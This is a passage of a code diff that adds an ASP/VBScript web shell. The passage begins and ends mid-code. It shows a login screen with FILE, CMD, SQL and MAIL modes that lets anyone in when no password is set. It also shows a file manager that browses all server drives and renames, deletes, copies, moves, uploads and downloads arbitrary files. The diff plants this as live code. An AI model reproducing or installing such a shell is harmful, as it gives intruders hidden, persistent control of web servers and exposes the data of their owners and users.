+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the folder """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the folder """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the folder """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+case "RenameFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+itemPath=addslash(targetPath) & itemName
+set item=FSO.GetFile(itemPath)
+item.Name=newName
+if Err.Number<>0 then
+gMsg="Unable to rename the file """ & itemName & """, an error occured..."
+else
+gMsg="Renamed the file """ & itemName & """ to """ & newName & """..."
+end if
+else
+gMsg="Unable to rename the file """ & itemName & """, there exists a file or a folder with the new name """ & newName & """..."
+end if
+end select
+
+set item=nothing
+end sub
+
+'###########################################################################################
+
+sub List()
+dim objFolder,folder,item,intCount,bOpen,ext,count
+if not FSO.FolderExists(targetPath) then
+gMsg="Folder not found"
+else
+on error resume next
+set objFolder=FSO.GetFolder(targetPath)
+if Err.Number<>0 then
+gMsg="Can't open folder"
+else
+intCount=objFolder.SubFolders.Count+objFolder.Files.Count
+if Err.Number<>0 then
+gMsg="Permission denied"
+else
+%>
+<input type=button value=Refresh onclick="Command('Refresh')">
+<input type=button value="New File" onclick="Command('NewFile')">
+<input type=button value="New Folder" onclick="Command('NewFolder')">
+<input type=button value=Upload onclick="frmUpload.max.focus()">
+<input type=button value=Tree onclick="Command('Tree')">
+<%
+bOpen=true
+end if
+end if
+end if
+HtmlQuick()
+if gMsg<>"" then Response.Write "<p>" & gMsg & vbNewLine
+if bOpen then
+count=0
+if intCount>0 then Response.Write "<p>" & objFolder.SubFolders.Count & " subfolder(s)<br>" & vbNewLine & objFolder.Files.Count & " file(s)<br>" & vbNewLine
+if bSize then Response.Write "(" & FormatSize(objFolder.Size) & ")<br>" & vbNewLine
+%>
+<p>
+<table border=1 width=100%>
+<tr>
+<td><b>N</b>ame</td>
+<td align=center><b>S</b>ize</td>
+<td align=center><b>T</b>ype</td>
+<td align=center><b>M</b>odified</td>
+<td><b>A</b>ttributes</td>
+<td><b>A</b>ctions</td>
+<tr>
+<%
+if not isroot(targetPath) then
+%>
+<tr>
+<td><a href="javascript:Command('LevelRoot')" title="Up Root Level">\</a></td>
+<td> </td>
+<td align=center>Root</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<tr>
+<td><a href="javascript:Command('LevelUp')" title="Up One level">..</a></td>
+<td> </td>
+<td align=center>Up</td>
+<td> </td>
+<td> </td>
+<td> </td>
+</tr>
+<%
+end if
+if intCount>0 then
+HtmlJsForm()
+%>
+<form name=theForm method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+<%
+for each item in objFolder.SubFolders
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('OpenFolder',"" & item.Name & "")""" 
+if Len(item.Name)>gMax then Response.Write " title=""" & item.Name & """"
+Response.Write ">" & FormatName(item.Name) & "</a></td>" & vbNewLine
+Response.Write " <td align=right> </td>" & vbNewLine
+Response.Write " <td align=center>DIR</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=d value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFolder',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFolder',"" & item.Name & "")""></td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+for each item in objFolder.Files
+count=count+1
+Response.Write "<tr>" & vbNewLine
+Response.Write " <td><a href=""javascript:Command('Download',"" & item.Name & "")"""
+ext=FSO.GetExtensionName(addslash(targetPath) & item.Name)
+re.IgnoreCase = true
+re.Pattern = "^" & ext & ",|," & ext & ",|," & ext & "$"
+if re.Test(lnkExt) then
+Response.Write " title=""-> " & Server.Htmlencode(FindLink(addslash(targetPath) & item.Name)) & """"
+elseif Len(item.Name)>gMax then
+Response.Write " title=""" & item.Name & """"
+end if
+
+Response.Write ">" & FormatName(item.Name) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatSize(item.Size) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & item.Type & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(item.DateLastModified ) & "</td>" & vbNewLine
+Response.Write " <td>" & GetAttributes(item.Attributes) & "</td>" & vbNewLine
+Response.Write " <td><input type=checkbox name=f value=""" & item.Name & """><input type=button value=Ren onclick=""Command('RenameFile',"" & item.Name & "")""><input type=button value=Attr onclick=""Command('ChangeAttributesFile',"" & item.Name & "")"">"
+
+if re.Test(editExt) then
+Response.Write "<input type=button value=Edit onclick=""Command('Edit',"" & item.Name & "")"">"
+end if
+
+if Lcase(ext)="zip" then
+Response.Write "<input type=button value=Info onclick=""Command('ZipInfo',"" & item.Name & "")"">"
+end if
+
+Response.Write "</td>" & vbNewLine
+Response.Write "</tr>" & vbNewLine
+next
+if count>0 then
+%>
+<tr>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td> </td>
+<td><input type=checkbox name=allbox title="Select All" onclick="CheckAll()"><input type=button value=Delete title="Delete Selected Item(s)" onclick="DoWork('Delete')"></td>
+</tr>
+<%
+end if
+%>
+</table>
+<%
+if count>1 then
+%>
+<p>
+<table>
+<tr><td><b>C</b>opy selected item(s) to</td><td><input type=text name=cp value="<%=Session("cp_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.cp_bt.click();"> <input type=button id=cp_bt value=Copy onclick="DoWork('Copy')"></td></tr>
+<tr><td><b>M</b>ove selected item(s) to</td><td><input type=text name=mv value="<%=Session("mv_dst")%>" size=50 onkeydown=" if (event.keyCode==13) theForm.mv_bt.click();"> <input type="button" id=mv_bt value=Move onclick="DoWork('Move')"></td></tr>
+</table>
+<%
+end if
+%>
+</form>
+</table>
+<%
+end if
+set objFolder=nothing
+%>
+<p><b>U</b>pload file(s) to "<%=targetPath%>"
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=gURL%>">
+<input type=hidden name=folder value="<%=targetPath%>">
+Max: <input type=text name=max value=5 size=5> <input type=button value=# onclick="setid()"><br>
+<table>
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload>
+</form>
+<script>
+setid();
+function setid() {
+str='<br>';
+if (frmUpload.max.value<=0) frmUpload.max.value=1;
+for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end if
+%>
+<form name=frmFile method=post action="<%=gURL%>">
+<input type=hidden name=command value="">
+<input type=hidden name=param value="">
+<input type=hidden name=folder value="<%=targetPath%>">
+</form>
+<script>frmAddress.param.focus()</script>
+<%
+HtmlJsCommand()
+end sub
+
+'###########################################################################################
+
+sub Upload()
+dim objUpload,f,max,i,name,path,size,success
+
+HtmlHeader("")
+HtmlMode()
+
+set objUpload=New clsUpload
+
+targetPath=objUpload.Fields("folder").Value
+max=objUpload.Fields("max").Value
+
+gMsg= "<b>U</b>pload..." & vbNewLine
+
+for i=1 to max
+name=objUpload.Fields("file" & i).FileName
+size=objUpload.Fields("file" & i).Length
+if (name<>"") and (size>0) then
+gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+path=addslash(targetPath) & name
+objUpload.Fields("file" & i).SaveAs path
+if FSO.FileExists(path) then
+on error resume next
+set f=FSO.GetFile(path)
+if IsObject(f) then
+if f.Size=size then success=true else success=false
+end if
+set f=nothing
+end if
+if success then gMsg=gMsg & "success" else gMsg = gMsg & "fail"
+end if
+next
+
+set objUpload=nothing
+
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Download()
+dim oStream
+dim szFileName
+szFileName=addslash(Request.Form("folder")) & Request.form("Param")
+if FSO.FileExists(szFileName) then
+set oStream=Server.CreateObject("ADODB.Stream")
+oStream.Type=1
+oStream.Open
+on error resume next
+oStream.LoadFromFile(szFileName)
+if Err.Number=0 then
+Response.AddHeader "Content-Disposition", "attachment; filename=" & FSO.GetFileName(szFileName)
+Response.AddHeader "Content-Length", oStream.Size
+Response.ContentType="bad/type" 'yeu cau ie hien hop thoai save-as
+Response.BinaryWrite oStream.Read
+end if
+oStream.Close
+set oStream=nothing
+end if
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Logout()
+Session.Abandon
+Response.Redirect gURL
+Destroy()
+end sub
+
+sub Init()
+Session("switch")=false
+set FSO=Server.CreateObject("Scripting.FileSystemObject")
+set re=new regexp
+end sub
+
+sub Destroy()
+set FSO=nothing
+set re=nothing
+Response.End
+end sub
+
+'###########################################################################################
+
+sub Secure()
+if (Session("allow")=1) then exit sub
+if (gPassword="") then
+Session("allow")=1
+Session("mode")=0
+exit sub
+end if
+if (Request.Form("command")="Login") then
+if Request.Form("password")=gPassword then
+Session("allow")=1
+Session("mode")=CInt(Request.Form("mode"))
+exit sub
+end if
+end if
+
+HtmlHeader("")
+%>
+<form name=frmLogin method=post action="<%=gURL%>">
+<table>
+<tr>
+<td><b>M</b>ode:</td>
+<td>
+<select name=mode>
+<option value=0 selected>FILE
+<option value=1>CMD
+<option value=2>SQL
+<option value=3>MAIL
+</select>
+</td>
+</tr>
+<tr>
+<td><b>P</b>assword:</td>
+<td><input type=password name=password></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=command value=Login></td>
+</tr>
+</table>
+</form>
+<script>frmLogin.password.focus()</script>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub HtmlJsForm()
+%>
+<script>
+function CheckAll() {
+var fmobj=document.theForm;
+for (var i=0; i<fmobj.elements.length;i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (!e.disabled)) {
+e.checked=fmobj.allbox.checked;
+}
+}
+if (fmobj.allbox.checked) {
+fmobj.allbox.title='Clear All';
+} else {
+fmobj.allbox.title='Select All';
+}
+}
+
+function DoWork(cmd) {
+var s;
+var fmobj=document.theForm;
+var total=0;
+for (var i=0; i<fmobj.elements.length; i++) {
+var e=fmobj.elements<i>;
+if ((e.name!='allbox') && (e.type=='checkbox') && (e.checked)) total++;
+}
+
+if (total<1) return;
+
+s=(total>1)?'s':'';
+
+switch (cmd) {
+case "Delete":
+if (!confirm('Are you sure to delete ' + total + ' selected item' + s + ' ?')) return;
+break;
+case "Move":
+var mv=fmobj.mv.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (mv=='') return;
+if ( re1.test(mv) || re2.test(mv) ){
+if (!confirm('Are you sure to move ' + total + ' selected item' + s + ' to "' + mv + '" ?')) return;
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "Copy":
+var cp=fmobj.cp.value;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (cp=='') return;
+if ( re1.test(cp) || re2.test(cp) ) {
+} else {
+alert('Invalid path name !');
+return;
+}
+break;
+default:
+return;
+}
+
+fmobj.command.value=cmd;
+fmobj.submit();
+}
+</script>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlJsCommand()
+%>
+<script>
+function openWin(winName, urlLoc, w, h, showStatus, isViewer) {
+l = (screen.availWidth - w)/2;
+t = (screen.availHeight - h)/2;
+features = "toolbar=no"; // yes|no 
+features += ",location=no"; // yes|no 
+features += ",directories=no"; // yes|no 
+features += ",status=" + (showStatus?"yes":"no"); // yes|no 
+features += ",menubar=no"; // yes|no 
+features += ",scrollbars=" + (isViewer?"yes":"no"); // auto|yes|no 
+features += ",resizable=" + (isViewer?"yes":"no"); // yes|no 
+features += ",dependent"; // close the parent, close the popup, omit if you want otherwise 
+features += ",height=" + h;
+features += ",width=" + w;
+features += ",left=" + l;
+features += ",top=" + t;
+winName = winName.replace(/[^a-z]/gi,"_");
+return window.open(urlLoc,winName,features);
+} 
+
+function createPage (theWin, cmd, param){
+frmFile.target = theWin.name;
+frmFile.command.value = cmd;
+frmFile.param.value = param;
+frmFile.submit();
+}
+
+function CheckName(str) {
+var re;
+re = /[\\/:*?"<>|]/gi;
+if (re.test(str)) return false; 
+else return true;
+} 
+
+function Command(cmd, param) {
+var str;
+var someWin;
+switch (cmd) {
+case "Tree":
+str = prompt("Please enter a name for the folder to tree", frmFile.folder.value);
+if (!str) return;
+var re1=/^\s*[A-Z]{1}:[^\"\*\?\<\>\|]*\s*$/gi;
+var re2=/^\s*:{1}[^\s]+/gi;
+if (re1.test(str) || re2.test(str)) {
+var winName=cmd + document.forms.frmFile.param.value;
+param=str;
+document.forms.frmFile.param.value=param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+}
+else {
+alert('Invalid path name !');
+return;
+}
+break;
+case "NewFile":
+str = prompt("Please enter a name for the new file", "New File");
+if(!str) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "NewFolder":
+str = prompt("Please enter a name for the new folder", "New Folder");
+if(!str) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = str;
+break;
+case "RenameFile":
+str = prompt("Please enter the new name for the file", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("File name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "RenameFolder":
+str = prompt("Please enter the new name for the folder", param);
+if (!str || (str==param)) return;
+else if (!CheckName(str)) {alert("Folder name can not contain any of the\nfollowing characters: \\ / : * ? \" < > |"); return;}
+frmFile.param.value = param + "|" + str;
+break;
+case "Edit":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 600, 440, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ChangeAttributesFile":
+case "ChangeAttributesFolder":
+str = frmFile.folder.value + param;
+someWin = openWin(cmd + str, "", 300, 160, true, false);
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break;
+case "ZipInfo":
+var winName=cmd + document.forms.frmFile.folder.value + param;
+winName=winName.replace(/[^a-z]/gi,"_");
+someWin=window.open("", winName, "toolbar=yes,location=no,directories=no,status=yes,menubar=yes,scrollbars=yes,resizable=yes");
+someWin.focus();
+createPage(someWin,cmd,param);
+someWin = null;
+return;
+break
+default:
+frmFile.param.value = param;
+}
+frmFile.target = "";
+frmFile.command.value = cmd
+frmFile.submit(); 
+}
+</script>
+<%
+end sub
+
+sub HtmlJsEditor()
+%>
+<script>
+function EditorCommand (cmd) {
+switch (cmd) {
+case "WordWrap":
+if (frmFile.wrap.checked) frmFile.content.wrap="soft";
+else frmFile.content.wrap="off";
+frmFile.content.focus();
+break;
+case "Reload":
+frmFile.reset();
+break;
+case "Save":
+frmFile.subcommand.value = "Save";
+frmFile.submit();
+break;
+case "SaveAs":
+var str, oldname;
+oldname = frmFile.param.value;
+str = prompt("Save the file as :", oldname);
+if (!str || str==oldname) return;
+frmFile.param.value = str;
+frmFile.subcommand.value = "SaveAs";
+frmFile.submit();
+break;
+}
+}
+</script>
+<%
+end sub
+
+sub HtmlQuick()
+%>
+<form name=frmQuick method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<select name=param onchange="frmQuick.submit()">
+<%
+dim dc,d,dName,dType
+set dc=FSO.Drives
+for each d in dc
+dName=d.DriveLetter&":\"
+select case d.DriveType
+case 0 dType="Unknown"
+case 1 if d.driveletter="A" then dType="?" else dType="?"
+dType=dType&" Floppy" 'maybe wrong
+case 2 dType="HDD " & FormatSize(d.TotalSize)
+case 3 dType="Network"
+case 4
+dType="CD-ROM"
+if not d.IsReady then dType=dType & " - not ready"
+case 5
+dType="RAM Disk"
+end select
+Response.Write "<option value=""" & dName & """"
+if d.DriveLetter=Ucase(Left(targetPath,1)) then Response.Write " selected"
+Response.Write ">" & dName& " (" & dType & ")" & vbNewLine
+next
+set dc=nothing
+%>
+</select>
+</form>
+<form name=frmAddress method=post action="<%=gURL%>">
+<input type=hidden name=command value=OpenFolder>
+<b>A</b>ddress: <input type=text name=param value="<%=targetPath%>" size=90> <input type=submit value=Go>
+</form>
+<%
+end sub
+
+sub HtmlMode()
+%>
+<table>
+<tr>
+<td>
+<form name=frmChangeMode method=post action="<%=gURL%>">
+<input type=hidden name=command value=ChangeMode>
+<select name=mode onchange="frmChangeMode.submit()">
+<option value=0<%if Session("mode")=0 then Response.Write " selected"%>>FILE
+<option value=1<%if Session("mode")=1 then Response.Write " selected"%>>CMD
+<option value=2<%if Session("mode")=2 then Response.Write " selected"%>>SQL
+<option value=3<%if Session("mode")=3 then Response.Write " selected"%>>MAIL
+</select>
+</form>
+</td>
+<%
+if gPassword<>"" then
+%>
+<td>
+<form name=frmLogout method=post action="<%=gURL%>">
+<input type=submit name=command value=Logout>
+</form>
+</td>
+<%
+end if
+%>
+</tr>
+</table>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlHeader(strTitle)
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=strTitle%></title>
+<style>
+select,input{font-family:Verdana;font-size:9pt}
+</style>
+</head>
+<body>
+<%
+end sub
+
+'###########################################################################################
+
+sub HtmlFooter()
+%>
+</body>
+</html>
+<%
+end sub
+
+'###########################################################################################
+
+function abspath(path)
+if left(path,1)=":" then abspath=Server.MapPath(mid(path,2)) else abspath=FSO.GetAbsolutePathName(path)
+end function
+
+'###########################################################################################
+
+function addslash(path)
+if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+'###########################################################################################
+
+function findroot(path)
+dim f
+
+set f=FSO.GetFolder(path)
+
+if f.IsRootFolder then
+else
+do until f.IsRootFolder
+set f=f.ParentFolder
+loop
+end if
+findroot=f.Path
+set f=nothing
+end function
+
+'###########################################################################################
+
+function isroot(path)
+dim f
+set f=FSO.GetFolder(path)
+isroot=f.IsRootFolder
+set f=nothing
+end function
+
+'###########################################################################################
+
+Function FindLink(szFileName)
+Dim WshShell, oLink
+
+Set WshShell=Server.CreateObject("WScript.Shell")
+Set oLink=WshShell.CreateShortcut(szFileName)
+
+FindLink=oLink.TargetPath
+
+Set oLink=Nothing
+Set WshShell=Nothing
+End Function
+
+'###########################################################################################
+
+Function FormatSize(intSize)
+If (intSize < 1024) Then
+FormatSize = intSize & " B"
+ElseIf (intSize < 1024*1024) Then
+FormatSize = FormatNumber(intSize/1024,2) & " KB"
+ElseIf (intSize < 1024*1024*1024) Then
+FormatSize = FormatNumber(intSize/(1024*1024),2) & " MB"
+Else
+FormatSize = FormatNumber(intSize/(1024*1024*1024),2) & " GB"
+End If
+End Function
+
+'###########################################################################################
+
+Function FormatName(szName)
+FormatName = szName
+If gMax > 5 And Len(szName) > gMax Then FormatName = Left(szName,gMax-2) & "..."
+End Function
+
+'###########################################################################################
+
+function FormatDate(strDate)
+dim int12HourPart,strAMPM
+int12HourPart=DatePart("h",strDate) mod 12
+if int12HourPart=0 then int12HourPart=12
+if DatePart("h",strDate)>=12 then strAMPM="PM" else strAMPM="AM"
+FormatDate=Right("0"&DatePart("d",strDate),2) & "/" & Right("0"&DatePart("m",strDate),2) & "/" & DatePart("yyyy",strDate) & " " & Right("0"&int12HourPart,2) & ":" & Right("0"&DatePart("n",strDate),2) & ":" & Right("0"&DatePart("s",strDate),2) & " " & strAMPM
+end function
+
+'###########################################################################################
+
+Function GetAttributes(intAttr)
+Dim strAttributes
+strAttributes=""
+If (intAttr And 1) > 0 Then strAttributes = "R"
+If (intAttr And 2) > 0 Then strAttributes=strAttributes & "H"
+If (intAttr And 4) > 0 Then strAttributes=strAttributes & "S"
+If (intAttr And 32) > 0 Then strAttributes=strAttributes & "A"
+If (intAttr And 2048) > 0 Then strAttributes=strAttributes & "C"
+if strAttributes="" then strAttributes=" "
+GetAttributes=strAttributes
+End Function
+
+'###########################################################################################
+
+Class clsField
+Public Name
+Private mstrPath
+Public FileDir
+Public FileExt
+Public FileName
+Public ContentType
+Public Value
+Public BinaryData
+Public Length
+Private mstrText
+
+Public Property Get BLOB()
+BLOB = BinaryData
+End Property
+
+Public Function BinaryAsText()
+Dim lbinBytes
+Dim lobjRs
+If Length = 0 Then Exit Function
+If LenB(BinaryData) = 0 Then Exit Function
+
+If Not Len(mstrText) = 0 Then
+BinaryAsText = mstrText
+Exit Function
+End If
+lbinBytes = ASCII2Bytes(BinaryData)
+mstrText = Bytes2Unicode(lbinBytes)
+BinaryAsText = mstrText
+End Function
+
+Public Sub SaveAs(ByRef pstrFileName)
+Const adTypeBinary=1
+Const adSaveCreateOverWrite=2
+Dim lobjStream
+Dim lobjRs
+Dim lbinBytes
+If Length = 0 Then Exit Sub
+If LenB(BinaryData) = 0 Then Exit Sub
+Set lobjStream = Server.CreateObject("ADODB.Stream")
+lobjStream.Type = adTypeBinary
+Call lobjStream.Open()
+lbinBytes = ASCII2Bytes(BinaryData)
+Call lobjStream.Write(lbinBytes)
+On Error Resume Next
+Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+Call lobjStream.Close()
+Set lobjStream = Nothing
+End Sub
+
+Public Property Let FilePath(ByRef pstrPath)
+mstrPath = pstrPath
+If Not InStrRev(pstrPath, ".") = 0 Then
+FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+FileExt = UCase(FileExt)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+End If
+If Not InStrRev(pstrPath, "\") = 0 Then
+FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+End If
+End Property
+
+Public Property Get FilePath()
+FilePath = mstrPath
+End Property
+
+Private Function ASCII2Bytes(ByRef pbinBinaryData)
+Const adLongVarBinary=205
+Dim lobjRs
+Dim llngLength
+Dim lbinBuffer
+llngLength = LenB(pbinBinaryData)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+Call lobjRs.Update()
+lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+Call lobjRs.Close()
+Set lobjRs = Nothing
+ASCII2Bytes = lbinBuffer
+End Function
+
+Private Function Bytes2Unicode(ByRef pbinBytes)
+Dim lobjRs
+Dim llngLength
+Dim lstrBuffer
+llngLength = LenB(pbinBytes)
+Set lobjRs = Server.CreateObject("ADODB.Recordset")
+Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+Call lobjRs.Open()
+Call lobjRs.AddNew()
+Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+Call lobjRs.Update()
+lstrBuffer = lobjRs.Fields("BinaryData").Value
+Call lobjRs.Close()
+Set lobjRs = Nothing
+Bytes2Unicode = lstrBuffer
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsUpload
+Private mbinData
+Private mlngChunkIndex
+Private mlngBytesReceived
+Private mstrDelimiter
+Private CR
+Private LF
+Private CRLF
+Private mobjFieldAry()
+Private mlngCount
+
+Private Sub RequestData
+Dim llngLength
+mlngBytesReceived = Request.TotalBytes
+mbinData = Request.BinaryRead(mlngBytesReceived)
+End Sub
+
+Private Sub ParseDelimiter()
+mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+End Sub
+
+Private Sub ParseData()
+Dim llngStart
+Dim llngLength
+Dim llngEnd
+Dim lbinChunk
+llngStart = 1
+llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+While Not llngStart = 0
+llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+llngLength = llngEnd - llngStart
+lbinChunk = MidB(mbinData, llngStart, llngLength)
+Call ParseChunk(lbinChunk)
+llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+Wend
+End Sub
+
+Private Sub ParseChunk(ByRef pbinChunk)
+Dim lstrName
+Dim lstrFileName
+Dim lstrContentType
+Dim lbinData
+Dim lstrDisposition
+Dim lstrValue
+lstrDisposition = ParseDisposition(pbinChunk)
+lstrName = ParseName(lstrDisposition)
+lstrFileName = ParseFileName(lstrDisposition)
+lstrContentType = ParseContentType(pbinChunk)
+If lstrContentType = "" Then
+lstrValue = CStrU(ParseBinaryData(pbinChunk))
+Else
+lbinData = ParseBinaryData(pbinChunk)
+End If
+Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+End Sub
+
+Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+Dim lobjField
+ReDim Preserve mobjFieldAry(mlngCount)
+Set lobjField = New clsField
+lobjField.Name = pstrName
+lobjField.FilePath = pstrFileName 
+lobjField.ContentType = pstrContentType
+If LenB(pbinData) = 0 Then
+lobjField.BinaryData = ChrB(0)
+lobjField.Value = pstrValue
+lobjField.Length = Len(pstrValue)
+Else
+lobjField.BinaryData = pbinData
+lobjField.Length = LenB(pbinData)
+lobjField.Value = ""
+End If
+Set mobjFieldAry(mlngCount) = lobjField
+mlngCount = mlngCount + 1
+End Sub
+
+Private Function ParseBinaryData(ByRef pbinChunk)
+Dim llngStart
+llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+If llngStart = 0 Then Exit Function
+llngStart = llngStart + 4
+ParseBinaryData = MidB(pbinChunk, llngStart)
+End Function
+
+Private Function ParseContentType(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 15
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+End Function
+
+Private Function ParseDisposition(ByRef pbinChunk)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 22
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+End Function
+
+Private Function ParseName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 6
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+' ------------------------------------------------------------------------------
+Private Function ParseFileName(ByRef pstrDisposition)
+Dim llngStart
+Dim llngEnd
+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 10
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+
+Public Property Get Count()
+Count = mlngCount
+End Property
+
+Public Default Property Get Fields(ByVal pstrName)
+Dim llngIndex
+If IsNumeric(pstrName) Then
+llngIndex = CLng(pstrName)
+If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+Exit Property
+End If
+Set Fields = mobjFieldAry(pstrName)
+Else
+pstrName = LCase(pstrname)
+For llngIndex = 0 To mlngCount - 1
+If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+Set Fields = mobjFieldAry(llngIndex)
+Exit Property
+End If
+Next
+End If
+Set Fields = New clsField
+End Property
+
+Private Sub Class_Terminate()
+Dim llngIndex
+For llngIndex = 0 To mlngCount - 1
+Set mobjFieldAry(llngIndex) = Nothing
+
+Next
+ReDim mobjFieldAry(-1)
+End Sub
+
+Private Sub Class_Initialize()
+ReDim mobjFieldAry(-1)
+CR = ChrB(Asc(vbCr))
+LF = ChrB(Asc(vbLf))
+CRLF = CR & LF
+mlngCount = 0
+Call RequestData
+Call ParseDelimiter()
+Call ParseData
+End Sub
+
+Private Function CStrU(ByRef pstrANSI)
+Dim llngLength
+Dim llngIndex
+llngLength = LenB(pstrANSI)
+For llngIndex = 1 To llngLength
+CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+Next
+End Function
+
+Private Function CStrB(ByRef pstrUnicode)
+Dim llngLength
+Dim llngIndex
+llngLength = Len(pstrUnicode)
+For llngIndex = 1 To llngLength
